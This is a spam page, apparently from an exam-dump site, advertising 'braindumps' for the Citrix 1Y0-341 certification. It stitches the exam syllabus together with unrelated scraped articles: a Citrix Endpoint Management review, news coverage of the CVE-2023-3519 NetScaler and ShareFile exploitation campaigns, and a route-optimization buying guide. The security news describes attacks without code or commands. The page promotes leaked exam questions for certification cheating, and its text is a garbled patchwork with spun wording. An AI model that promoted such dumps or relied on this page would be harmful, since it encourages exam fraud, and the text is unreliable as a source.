Make your day with 1Y0-341 braindumps for your exam success
Killexams.com provides legitimate and up in order to date and precise 1Y0-341 Question Bank with a 100% move guarantee. You require to practice queries for at least twenty-four hrs to score high inside the exam. Your own actual task in order to pass in 1Y0-341 examination, commences with killexams.com test exercise questions.
Exam Code: 1Y0-341 Practice exam 2023 by Killexams.com team 1Y0-341 Citrix ADC Advanced subjects - Security Management and Optimization Exam Specification: 1Y0-341 Citrix ADC Advanced subjects - Security Management and Optimization
1. Introduction to Citrix ADC Security and Optimization
- Overview of Citrix ADC and its role in security and optimization
- Understanding the importance of security management and optimization
- Exploring advanced subjects related to Citrix ADC security and optimization
2. Advanced Security Features and Configuration
- Configuring advanced security policies and features
- Implementing SSL/TLS offloading and client certificate authentication
- Protecting against common web attacks using Citrix ADC
3. Traffic Optimization and Load Balancing
- Advanced traffic optimization techniques
- Load balancing configurations and algorithms
- Implementing global server load balancing (GSLB) for high availability
4. Citrix ADC Management and Troubleshooting
- Managing Citrix ADC appliances and configurations
- Monitoring and troubleshooting security and optimization issues
- Utilizing logs and diagnostic tools for problem resolution
5. Citrix ADC Security Best Practices
- Implementing security best practices for Citrix ADC deployments
- Securing Citrix ADC management interfaces and access
- Auditing and compliance considerations for Citrix ADC security
Exam Objectives:
1. Understand the role and importance of security management and optimization in Citrix ADC.
2. Configure advanced security features and policies in Citrix ADC.
3. Implement SSL/TLS offloading and client certificate authentication.
4. Protect against common web attacks using Citrix ADC.
5. Optimize traffic and load balancing using Citrix ADC.
6. Implement global server load balancing (GSLB) for high availability.
7. Manage and troubleshoot Citrix ADC appliances and configurations.
8. Monitor and troubleshoot security and optimization issues.
9. Implement security best practices for Citrix ADC deployments.
10. Secure Citrix ADC management interfaces and access.
11. Understand auditing and compliance considerations for Citrix ADC security.
Exam Syllabus:
Section 1: Introduction to Citrix ADC Security and Optimization (10%)
- Overview of Citrix ADC and its role in security and optimization
- Importance of security management and optimization
- Advanced subjects in Citrix ADC security and optimization
Section 2: Advanced Security Features and Configuration (30%)
- Configuring advanced security policies and features
- Implementing SSL/TLS offloading and client certificate authentication
- Protecting against common web attacks using Citrix ADC
Section 3: Traffic Optimization and Load Balancing (20%)
- Advanced traffic optimization techniques
- Load balancing configurations and algorithms
- Implementing global server load balancing (GSLB) for high availability
Section 4: Citrix ADC Management and Troubleshooting (25%)
- Managing Citrix ADC appliances and configurations
- Monitoring and troubleshooting security and optimization issues
- Utilizing logs and diagnostic tools for problem resolution
Section 5: Citrix ADC Security Best Practices (15%)
- Implementing security best practices for Citrix ADC deployments
- Securing Citrix ADC management interfaces and access
- Auditing and compliance considerations for Citrix ADC securityCitrix ADC Advanced subjects - Security Management and Optimization Citrix Optimization basics Killexams : Citrix Optimization basics - BingNews
https://killexams.com/pass4sure/exam-detail/1Y0-341
Search resultsKillexams : Citrix Optimization basics - BingNews
https://killexams.com/pass4sure/exam-detail/1Y0-341
https://killexams.com/exam_list/CitrixKillexams : Citrix Endpoint Management MDM review
Formerly known as Xenmobile, Citrix Endpoint Manager is a unified device management system that provides a simplified platform for IT departments to monitor and administer hardware of all types.
With features beyond the scope of standard Mobile Device Management (MDM) products, Citrix Endpoint Manager supports all commercially available mobile operating systems and desktop OSs. Offered stand-alone or as part of a more comprehensive selection of Citrix business software, Citrix Endpoint Manager aims to be seamless for the end user and effortless for the IT department to manage.
Citrix Endpoint Management is a feature-packed MDM solution(Image credit: Citrix)
Features
Citrix Endpoint Manager is an upgraded version of Xenmobile, offering additional features.
In addition to the usual MDM functionalities like compliance management and application control, Citrix Endpoint Manager provides all the necessary tools for end-users to carry out their tasks. It offers a comprehensive BYOD management system with hassle-free enrollment and supports handheld scanners and similar endpoints.
The system enables easy tracking and identification of both devices and users, allowing for managing content viewed on devices (whether online or on corporate servers), deployment of software and apps, and assignment and withdrawal of permissions. The comprehensive inventory can be managed and grouped by device and other parameters, and policies can be applied and adjusted across hardware and users, all from the admin screen of Citrix Endpoint Manager.
Installation and setup
The Citrix Endpoint Manager is a powerful tool that operates seamlessly within a standard Citrix Workspace environment. It offers a comprehensive suite of tools and features for managing devices and applications within an organization.
With the ability to integrate with existing workspaces, the Endpoint Manager makes it easy to enroll devices and manage app distribution or restrictions across the network. To enroll devices, a console with all the necessary tools is provided, and end users can use the AutoDiscovery feature for enrollment, making the process simpler and reducing the workload on the MDM administrator.
An Apple Push Notifications developer account is required for Apple hardware, while Android devices require an organizational Google account and a Google Play account.
With the Citrix Endpoint Manager, organizations can streamline device management processes and Improve productivity and security.
Citrix Endpoint Manager works with most mobile and desktop operating systems(Image credit: Citrix)
Compatibility
Citrix Endpoint Manager offers integrated administration of Android and Android Enterprise, Chrome OS, macOS, iOS, tvOS, iPadOS, and Windows 10 devices. Only macOS and tvOS cannot be found on mobile hardware. Linux is only supported by a Citrix Ready workspace hub compatible with the Raspberry Pi 3.
Citrix Endpoint Manager can access and control these devices' management systems. So, for example, the Unified Endpoint Management capability in Windows 10 can be used to enroll and manage Windows 10 tablets and hybrids. Similarly, Citrix Endpoint Manager can access mobile device data, app information, and control security and other aspects in iOS for iPhone and iPadOS for the Apple iPad.
Additionally, Citrix Endpoint Manager supports Alexa for Business, making it the ideal choice for managing and administering mobile IoT devices and integrating those with the usual MDM hardware. Need to start a projector or dim the lights in the conference room? Those integrations can be handled from a permitted mobile device across the Citrix Endpoint Manager environment.
Usability
Citrix Endpoint Manager prioritizes both hardware and user compatibility. Rather than restricting users to specific devices, it takes a flexible approach, allowing organizations to determine the best machines, apps, and software vendors for their IT, colleagues, and overall business needs.
Citrix Workspace is a unified platform that can be accessed across devices and profiles, ensuring that users have the necessary tools on the hardware they use. Enrollment is simple and usually doesn't require repetition.
From an administrative perspective, each user and device can be easily managed through a user-friendly interface that provides analysis data. This interface allows you to monitor compliance information device statistics by platform and carrier and manage device security, apps, and permissions.
Citrix's price calculator can be quite handy for larger organizations(Image credit: Citrix)
Plans and pricing
Are you looking for pricing options for Citrix? They offer different packages that can be scaled according to the needs of your business.
The Stand-alone package integrates with other Citrix products and supports major platforms and hardware. This package costs $4 per user or $3 per monthly device.
Workspace Premium is a more comprehensive solution that costs $18 per user per month. This package offers a secure interface to access apps and files, including Citrix Endpoint Manager and other notable Citrix products.
Workspace Premium Plus costs $25 per user per month and includes hybrid deployment options for Citrix Virtual Apps and Desktops, with cloud management.
To know how much Citrix Endpoint Manager may cost, visit their website, which provides a helpful calculator. Simply choose a plan, usage type, and quantity to get an estimation (actual prices may vary).
For instance, if you have 500 users and choose the Stand-alone package on a one-year contract, it would cost $4.83 per user per month. If you choose a three-year contract, you could save 20% and pay only $3.87 per user monthly.
Final verdict
When selecting a mobile device management (MDM) solution, many factors must be considered. One important consideration is the offerings provided by established players in organizational collaboration networks. Citrix Endpoint Manager is a strong contender in this space due to its wide assortment of features and tools and its straightforward device enrollment process.
If your network is already utilizing Citrix Workspace or requires an upgrade, then choosing Citrix Endpoint Manager would be a sensible decision. The necessary operating systems and server software have already been installed, and the server hardware is operational. If your budget permits, transitioning to Citrix Endpoint Manager within an existing Citrix environment may be your most appropriate option.
With its powerful management capabilities and user-friendly interface, Citrix Endpoint Manager can help streamline your organization's mobile device management processes, allowing you to focus on what matters - your business.
Whether managing a small team of mobile workers or a large enterprise with thousands of devices, Citrix Endpoint Manager has the tools and features you need to succeed. So why not try it today and see how it can help take your mobile device management to the next level?
Thu, 29 Jul 2021 02:39:00 -0500Bryan M Wolfeentext/htmlhttps://www.techradar.com/reviews/citrix-endpoint-management-mdmKillexams : Thousands of Citrix Servers Exposed to Zero-Day Bug
Over 15,000 Citrix servers worldwide are at risk of compromise unless administrators patch urgently, a leading security non-profit has warned.
The Shadowserver Foundation trawls the internet for data on malicious activity. It revealed in a Twitter post on Friday that, of the impacted servers, the largest number were based in the US (5700) followed by Germany (1500), the UK (1000) and Australia (582).
“This assessment is version based – that is we tag all IPs where we see a version hash in a Citrix instance. This is due to the fact that Citrix has removed version hash information in latest revisions, including the latest update with the fix,” the non-profit explained in a longer note on its website.
“It is thus safe to assume in our view that all instances that still provide version hashes have not been updated and thus, providing no mitigation is in place, remain vulnerable. In addition, we have also added tagged as vulnerable instances that return a ‘Last Modified’ headers with a date before July 1, 2023 00:00:00Z. Make sure to update.”
Citrix posted an advisory about the vulnerability (CVE-2023-3519), and two others, on July 18. The unauthenticated remote code execution bug has a CVSS score of 9.8, marking it down as critical.
It impacts NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) and emerged as a zero-day vulnerability in early July after being advertised online by a threat actor.
“Exploits of CVE-2023-3519 on unmitigated appliances have been observed,” Citrix warned. “Cloud Software Group strongly urges affected customers of NetScaler ADC and NetScaler Gateway to install the relevant updated versions as soon as possible.”
The two other vulnerabilities listed in the advisory are CVE-2023-3466, a reflected cross-site scripting bug, and CVE-2023-3467, which enables privilege escalation to root administrator.
Sun, 23 Jul 2023 21:00:00 -0500en-gbtext/htmlhttps://www.infosecurity-magazine.com/news/thousands-citrix-servers-exposed/Killexams : About 2000 Citrix NetScalers Were Compromised in Massive Attack Campaigns
About 2,000 Citrix NetScalers were compromised in automated massive attack campaigns. Find out more about the threat actors and how to protect from them.
Image: CROCOTHERY/Adobe Stock
Threat actors have been exploiting a NetScaler appliance vulnerability to get persistent access to the compromised systems. Find out which NetScaler systems are affected, how attackers are hitting vulnerable systems worldwide and how to protect your business from this cybersecurity attack.
Jump to:
Exploited Citrix NetScaler vulnerability
Citrix published a security bulletin on July 18, 2023 about three vulnerabilities in NetScaler ADC and NetScaler Gateway: CVE-2023-3519, CVE-2023-3466 and CVE-2023-3467. This bulletin detailed exploits on CVE-2023-3519 observed in the wild on unmitigated appliances. Affected systems are:
NetScaler ADC and NetScaler Gateway 13.1-49.13 and later, 13.0-91.13 and later.
NetScaler ADC 13.1-FIPS 12.1-37.159 and later.
NetScaler ADC 12.1-FIPS 12.1-55.297 and later.
NetScaler ADC 12.1-NDcPP 12.1-55.297 and later.
ZScaler, a cloud security company, provided more details on how the NetScaler vulnerability can be triggered and allow an unauthenticated attacker to execute arbitrary code as the root user. A specially crafted HTTP GET request can be used to trigger a stack buffer overflow in the NetScaler Packet Processing Engine, which runs as root (Figure A). A proof of concept is available on GitHub.
Figure A
Example of a crafted packet containing shell code. Image: ZScaler
Exposed NetScaler appliances backdoored with web shells
Fox-IT, part of the information assurance firm NCC Group based in the U.K., responded to several incidents related to the vulnerability in July and August 2023, with several web shells found during the investigations. This is consistent with other reports such as the one from the nonprofit organization Shadowserver Foundation and trusted partners making the internet more secure.
Following those discoveries, Fox-IT scanned accessible NetScalers on the internet for known web shell paths. The researchers found that approximately 2,000 unique IP addresses were probably backdoored with a webshell as of Aug. 9, 2023. Fox-IT’s discoveries were shared with the Dutch Institute for Vulnerability Disclosure, which notified administrators of the vulnerable systems.
Shadowserver reported the U.S. is the country with the most unique IPs of unpatched systems, with more than 2,600 unique IPs being vulnerable to CVE-2023-3519 (Figure B).
Figure B
Unpatched NetScaler appliances vulnerable to CVE-2023-3519 as of Aug. 5, 2023. Image: Shadowserver Foundation
Fox-IT reported that approximately 69% of the NetScalers that currently contain a web shell backdoor are not vulnerable anymore to CVE-2023-3519; this means that, while most administrators have deployed the fixes, they have not carefully checked the systems for signs of successful exploitation and are still compromised. The company provides a map of compromised NetScaler appliances by country (Figure C).
Figure C
Compromised NetScaler appliances per country. Image: Fox-IT
Most compromised NetScalers are located in Europe. Fox-IT researchers stated that “there are stark differences between countries in terms of what percentage of their NetScalers were compromised. For example, while Canada, Russia and the United States of America all had thousands of vulnerable NetScalers on July 21, virtually none of these NetScalers were found to have a webshell on them. As of now, we have no clear explanation for these differences, nor do we have a confident hypothesis to explain which NetScalers were targeted by the adversary and which ones were not.”
Successful exploitation may lead to more than just planting web shells
In addition, the Cybersecurity and Infrastructure Security Agency reported web shell implants exploiting CVE-2023-3519. The report noted that attackers exploited the vulnerability as early as June 2023 and used the web shell to extend their compromise and exfiltrate the Active Directory of a critical infrastructure organization. The threat actor managed to access NetScale configuration files and decryption keys and used the decrypted AD credential to query the AD and exfiltrate the collected data.
While this critical infrastructure used segmentation that did not allow attackers to move further with their attacks, it is possible that other organizations might be fully compromised by threat actors using the same methods.
Dave Mitchell, chief technical officer at cybersecurity company HYAS, stated that “unfortunately, this is far from the first time this has happened in latest memory. In previous campaigns, attackers gained footholds within F5, Fortinet and VMware appliances through exposed management interfaces in order to avoid detection by EDR software. Regardless if the exploit is already in the wild, customers are expected to monitor their devices for the IOCs before and after the patch is applied — which is obviously not at an acceptable level. The reason for this gap may be education, outsourced managed devices or division of security labor within an organization, but I do not expect attacks on network devices to stop anytime soon.”
How to protect your business from this cybersecurity threat
Patch and update vulnerable Citrix NetScaler appliances now.
Check for compromises in the affected systems because, if a threat actor has successfully compromised the system, the person might be able to access it even though the patch has been deployed. Shadowserver provided command lines to detect typical web shell components in web-exposed folders of the appliances, together with binaries with higher privileges. CISA provided command lines to check for files created after the last installation on the appliance.
Analyze all HTTP log files carefully. Network log files such as DNS logs and AD/LDAP/LDAPS logs should be analyzed for any anomalies or traffic spikes.
Deploy security solutions on all systems to try to detect potential malware resulting from the attack.
Keep all appliances and systems up to date and patched with multifactor authentication enabled where possible to prevent attackers from exploiting common vulnerabilities and stolen credentials.
Disclosure: I work for Trend Micro, but the views expressed in this article are mine.
Fri, 18 Aug 2023 14:28:00 -0500en-UStext/htmlhttps://www.techrepublic.com/article/citrix-netscalers-compromised/Killexams : Hundreds of Citrix Endpoints Compromised With Webshells
Around 600 global Citrix servers have been compromised by a zero-day exploit enabling webshells to be installed, according to a non-profit tracking the ongoing campaign.
The Shadowserver Foundation tweeted on 2 August that the number of impacted endpoints stood at 581, but the figure is thought to be just the tip of the iceberg.
The biggest number of impacted IPs are based in Germany, followed by France and Switzerland.
As reported by Infosecurity last week, the malicious campaign exploits zero-day vulnerability CVE-2023-3519 to compromise NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway servers.
The unauthenticated remote code execution vulnerability was patched by Citrix on July 15 and has a CVSS score of 9.8.
“Exploits of CVE-2023-3519 on unmitigated appliances have been observed,” Citrix warned at the time. “Cloud Software Group strongly urges affected customers of NetScaler ADC and NetScaler Gateway to install the relevant updated versions as soon as possible.”
At the time, Citrix also patched two other vulnerabilities: reflected cross-site scripting bug CVE-2023-3466, and CVE-2023-3467, which enables privilege escalation to root administrator.
Warning from Shadowserver
The Shadowserver Foundation, which monitors malicious internet activity across the globe, alerted Citrix users to the campaign last week. It warned that over 15,000 NetScaler ADC and NetScaler Gateway servers were at risk of compromise, with the biggest number based in the US, followed by Germany, the UK and Australia.
The zero-day was originally exploited to drop webshells onto an unnamed US critical infrastructure organization’s non-production environment, according to the US Cybersecurity and Infrastructure Security Agency (CISA).
“The webshell enabled the actors to perform discovery on the victim’s active directory (AD) and collect and exfiltrate AD data,” it continued. “The actors attempted to move laterally to a domain controller but network segmentation controls for the appliance blocked movement.”
That attack happened back in June 2023.
Editorial image credit: Ken Wolter / Shutterstock.com
Wed, 02 Aug 2023 21:00:00 -0500en-gbtext/htmlhttps://www.infosecurity-magazine.com/news/hundreds-citrix-compromised/Killexams : Hackers exploit Citrix zero-day to target US critical infrastructure
Thousands of companies could be at risk from an actively exploited Citrix zero-day that hackers have already abused to target at least one critical infrastructure organization in the United States.
Citrix last week sounded the alarm about the critical-rated flaw, tracked as CVE-2023-3519 with a severity rating of 9.8 out of 10, which impacts NetScaler ADC and NetScaler Gateway devices. These enterprise-facing products are designed for secure application delivery and providing VPN connectivity, and are used extensively worldwide, particularly within critical infrastructure organizations.
Citrix warned that the zero-day could allow an unauthenticated, remote attacker to run arbitrary code on a device and said it has evidence that the vulnerability was exploited in the wild. Citrix released security updates to the vulnerability on July 18 and is urging customers to install the patches as soon as possible.
Days after Citrix’s warning, U.S. cybersecurity agency CISA revealed that the vulnerability had been exploited against a U.S. critical infrastructure organization in June, and was reported to the agency earlier in July.
CISA said that hackers exploited the flaw to drop a webshell on the organization’s NetScaler ADC appliance, enabling them to collect and exfiltrate data from the organization’s Active Directory, including information about users, groups, applications and devices on the network. But because the targeted appliance was isolated within the organization’s network, the hackers were unable to move laterally and compromise the domain controller.
While this organization successfully managed to ward off the hackers targeting its systems, thousands of other organizations could be at risk. The Shadowserver Foundation, a nonprofit organization that works to make the internet more secure, said it has found more than 15,000 Citrix servers worldwide at risk of compromise unless patches are applied.
The largest number of unpatched servers are based in the U.S. (5,700), followed by Germany (1,500), the U.K. (1,000) and Australia (582), according to their analysis.
It’s not yet known who is behind the exploitation of this vulnerability, but Citrix vulnerabilities have been known to be exploited by both financially motivated cybercriminals and state-sponsored threat actors, including groups linked to China.
In a blog post published over the weekend, researchers at Mandiant said that while they cannot yet attribute the intrusions to any known threat group, the activity is “consistent with previous operations by China-nexus actors based on known capabilities and actions against Citrix ADC’s in 2022.” Mandiant added that the intrusions are likely part of an intelligence-gathering campaign, noting that espionage-motivated threat actors continue to target technologies that do not support endpoint detection and response solutions, such as firewalls, IoT devices, hypervisors and VPNs.
“Mandiant has investigated dozens of intrusions at defense industrial base (DIB), government, technology, and telecommunications organizations over the years where suspected China-nexus groups have exploited zero-day vulnerabilities and deployed custom malware to steal user credentials and maintain long-term access to the victim environments,” the researchers said.
Mon, 24 Jul 2023 03:08:00 -0500en-UStext/htmlhttps://techcrunch.com/2023/07/24/citrix-zero-day-critical-infrastructure/Killexams : The Best Route Optimization Software Of 2023
You’ve already taken a terrific first step in exploring the best options for route optimization software by reviewing this Forbes list of top solutions. Still, we recognize that this is an important decision for your company, and selecting the best routing solution will require additional considerations to ensure you make the right choice for your organization.
Consider Who on Your Team Will Be Using the Software
The size and composition of your team will be a factor that impacts your choice of routing software. You need to consider the people who will use the software, too.
You want to choose software that is user-friendly for your drivers. Comfort with technology varies greatly, and hence, it’s best to choose a routing software that requires a minimal level of technical proficiency. Selecting software that’s easy to use makes initial deployment go more smoothly, prevents mistakes down the road and helps ensure that drivers hired after the initial deployment can quickly be trained on the software.
You also want to consider user-friendliness for dispatchers or other administrative staff who will use the routing software. Involving future software administrators and dispatchers in the software evaluation process will help you identify issues and opportunities that would not come to light without others’ feedback.
Try Out the Software Before You Buy It
Several top routing software providers offer free trials, including Onfleet, RoadWarrior and Motive. If a routing solution you’re interested in has a free trial, take advantage of that opportunity to get a feel for how the software would work for your team.
If a free trial is not available, schedule a personal demonstration of the software so you can ask questions about how the software handles your unique needs. You can also ask for the solution provider to deliver you references, so you can contact other software users directly to ask questions about their overall satisfaction levels.
Consider Your Budget
The pricing for routing software varies greatly. Software with basic features can be obtained for free or a few dollars a month; other solutions cost hundreds or even thousands per month.
Many providers don’t publish their rates because there are so many factors involved in delivering a precise price quote. Pricing is typically based on the number of user deployments, the variety of features included and the complexity of the routing requirements. Most providers offer add-on features, and those can add up.
Going with a solution that can scale up or down with you as your needs change is a wise way to ensure you’re not overpaying for routing software services.
Attacks leveraging a critical remote code execution bug in Citrix ShareFile, tracked as CVE-2023-24489, were observed by GreyNoise to have begun earlier last week, SecurityWeek reports. "GreyNoise has observed IPs attempting to exploit this vulnerability. Two have never seen GreyNoise before this activity," said GreyNoise. Such a flaw, which has already been patched in June, could be exploited to enable total application compromise, according to Citrix. Meanwhile, Assetnote, which identified and reported the flaw, said that the bug stemmed from various errors that cause unauthenticated file uploads. "Although the [vulnerable] endpoint is not enabled in all configurations, it has been common amongst the hosts we have tested. Given the number of instances online and the reliability of the exploit, we have already seen a big impact from this vulnerability," said Assetnote, which initially released a proof-of-concept code earlier this month before publishing more PoC exploits. Immediate application of updates has been urged for Citrix FileShare users.
Mon, 31 Jul 2023 05:28:00 -0500entext/htmlhttps://www.scmagazine.com/brief/initial-citrix-sharefile-rce-exploitation-commencesKillexams : CISA says hackers are exploiting a new file transfer bug in Citrix ShareFile
Hackers are exploiting a newly discovered vulnerability in yet another enterprise file transfer software, the U.S. government’s cybersecurity agency has warned.
CISA on Wednesday added a vulnerability in Citrix ShareFile, tracked as CVE-2023-24489, to its Known Exploited Vulnerabilities (KEV) catalog. The agency warned that the flaw poses “significant risks to the federal enterprise,” and mandated that federal civilian executive branch agencies — CISA included — apply vendor patches by September 6.
Citrix first released a warning about the vulnerability back in June. The flaw, which was given a vulnerability severity rating of 9.8 out of 10, is described as an improper access control bug that could allow an unauthenticated attacker to remotely compromise customer-managed Citrix ShareFile storage zones controllers, no passwords needed.
While Citrix ShareFile is predominantly a cloud-based file-transfer tool, it also provides a “storage zones controller” tool that enables organizations to store files on-premise or with supported cloud platforms, such as Amazon S3 and Windows Azure.
According to Dylan Pindur of Assetnote, who first discovered the vulnerability and warned that it stems from small errors in ShareFile’s implementation of AES encryption, as many as 6,000 organizations had publicly exposed instances as of July.
“A search online shows roughly 1,000-6,000 instances are internet accessible,” said Pindur. “This popularity, combined with the software being used to store sensitive data, meant if we found anything it could have quite an impact.”
Threat intelligence startup GreyNoise said it observed a “significant spike” in attacker activity after CISA published its warning about the ShareFile vulnerability.
The identity of the hackers behind the observed in-the-wild attacks is not yet known.
Corporate file-transfer software has become a popular target for hackers as these systems often store huge batches of highly sensitive data.
The Russia-linked Clop ransomware gang alone has claimed responsibility for targeting at least three corporate tools, including Accellion‘s MTA, Fortra’s GoAnywhere MFT and — most recently — Progress’ MOVEit Transfer.
According to the latest data from cybersecurity company Emsisoft, the ongoing MOVEit mass-attacks have so far claimed 668 victim organizations, affecting more than 46 million individuals. Just this week, it was revealed that more than four million Americans had their sensitive medical and health information stolen after IBM fell victim to the MOVEit hackers.
Thu, 17 Aug 2023 00:31:00 -0500en-UStext/htmlhttps://techcrunch.com/2023/08/17/cisa-hackers-citrix-sharefile-exploit/Killexams : Over 640 Citrix servers backdoored with web shells in ongoing attacks
Hundreds of Citrix Netscaler ADC and Gateway servers have already been breached and backdoored in a series of attacks targeting a critical remote code execution (RCE) vulnerability tracked as CVE-2023-3519.
Security researchers from the Shadowserver Foundation, a non-profit organization dedicated to enhancing internet security, now disclosed that attackers had deployed web shells on at least 640 Citrix servers in these attacks.
"We can say it's fairly standard China Chopper but we do not want to disclose more under the circumstances. I can say the amount we detect is much lower than the amount we believe to be out there, unfortunately," Shadowserver CEO Piotr Kijewski told BleepingComputer.
"We report on compromised appliances with webshells in your network (640 for 2023-07-30). We are aware of widespread exploitation happening July 20th already," Shadowserver said on their public mailing list.
"If you did not patch by then please assume compromise. We believe the actual amount of CVE-2023-3519 related webshells to be much higher than 640."
About two weeks ago, the count of Citrix appliances vulnerable to CVE-2023-3519 attacks stood at around 15,000. However, that number has since dropped to under 10,000, indicating some progress in mitigating the vulnerability.
Citrix released security updates on July 18th to address the RCE vulnerability, acknowledging that exploits had been observed on vulnerable appliances and urging customers to install the patches without delay.
The vulnerability primarily impacts unpatched Netscaler appliances configured as gateways (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or authentication virtual servers (AAA server).
In addition to addressing CVE-2023-3519, Citrix also patched two other high-severity vulnerabilities the same day, CVE-2023-3466 and CVE-2023-3467, which could be exploited for reflected cross-site scripting (XSS) attacks and privilege escalation to root.
The warning also highlighted that the vulnerability had already been exploited to breach the systems of a U.S. critical infrastructure organization.
"In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell on a critical infrastructure organization's NetScaler ADC appliance," CISA said.
"The webshell enabled the actors to perform discovery on the victim's active directory (AD) and collect and exfiltrate AD data. The actors attempted to move laterally to a domain controller but network-segmentation controls for the appliance blocked movement."
Ransomware gangs, including REvil and DoppelPaymer, have taken advantage of similar Citrix Netscaler ADC and Gateway vulnerabilities to breach corporate networks in past attacks.
This highlights the pressing need for security teams to make patching Citrix servers a top priority on their to-do lists.
Wed, 02 Aug 2023 19:45:00 -0500Sergiu Gatlanen-ustext/htmlhttps://www.bleepingcomputer.com/news/security/over-640-citrix-servers-backdoored-with-web-shells-in-ongoing-attacks/Killexams : Citrix NetScaler users told to patch new zero-day urgently
A zero-day vulnerability in Citrix NetScaler Application Delivery Controller (ADC) and Citrix NetScaler Gateway appears to be being exploited by an unspecified advanced persistent threat (APT) actor backed by the Chinese government and should be patched immediately.
Per Citrix’s initial advisory released on Tuesday 18 July, the three vulnerabilities patched by Citrix affect multiple versions of the NetScaler ADC (previously Citrix ADC) and NetScaler Gateway (previously Citrix Gateway) lines.
They are tracked as CVE-2023-3466, a reflected cross-site scripting flaw; CVE-2023-3467, a privilege escalation vulnerability; and CVE-2023-3519, an unauthenticated remote code execution (RCE) bug.
Of these, the issue of concern is the RCE vulnerability, CVE-2023-3519, which carries a CVSS score of 9.8, and it is this bug that was added to the US Cybersecurity and Infrastructure Security Agency’s (CISA’s) Known Exploited Vulnerabilities (KEV) list on 20 July.
The addition of a vulnerability to the KEV list mandates that US government bodies must address it by a set date. It carries no weight beyond this, but inclusion on this list is a sure sign that attention should be paid by all organisations.
According to the CISA, the threat actor exploited CVE-2023-3519 to drop a webshell on a non-production environment NetScaler ADC appliance owned by an operator of critical national infrastructure (CNI).
The RCE vulnerability, CVE-2023-3519, carries a CVSS score of 9.8 and was added to the US CISA’s Known Exploited Vulnerabilities list on 20 July. Inclusion on this list is a sure sign that attention should be paid by all organisations
Using this webshell, the actor then attempted to perform discovery actions on the victim’s active directory (AD) and exfiltrate data from it. They then tried to move laterally to a domain controller, but were thwarted in this instance when the appliance’s network-segmentation controls kicked in.
In this instance, the victim organisation was able to swiftly identify the compromise and duly reported the incident to both CISA and Citrix.
Assessing the impact of CVE-2023-3519, researchers at Mandiant, which played a key role in the initial investigation, said that because ADC devices are predominantly used in the IT sector and form a vital component of enterprise cloud datacentres, when it comes to ensuring the optimal delivery of enterprise applications, they present a tempting target.
However, wrote the analyst team, comprising James Nugent, Foti Castelan, Doug Bienstock, Justin Moore and Josh Murchie, Chinese threat actors often target devices that sit at the edge of the network because they can be harder to monitor, and very often don’t support intrusion detection solutions.
“Mandiant cannot attribute this activity based on the evidence collected thus far,” the team wrote. “However, this type of activity is consistent with previous operations by China-nexus actors based on known capabilities and actions against Citrix ADCs in 2022.
“The evolution of the China-nexus cyber threat landscape has evolved to such an extent that its ecosystem mirrors more closely that of financial crime clusters, with connections and code overlap not necessarily offering the comprehensive picture.”
Beyond applying the patch, Mandiant is additionally recommending that if any affected appliances are found to have been exploited, they should be rebuilt immediately. This upgrade process will overwrite some, but not all, of the directories where threat actors may drop webshells.
Security teams may also wish to re-evaluate whether or not their ADC or Gateway appliances’ management ports need unrestricted internet access, and limit access to only necessary IP addresses, which would make post-exploitation activities harder going forward.
Based on some of the other tactics, techniques and procedures (TTPs) outlined in Mandiant’s write-up, the research team is also recommending that affected organisations rotate all secrets stored in the configuration file, and any private keys or certificates useable for transport layer security (TLS) connections.
They may also wish to harden susceptible accounts in the domain to protect against credential exposure and limit a threat actor’s ability to obtain credentials for lateral movement.
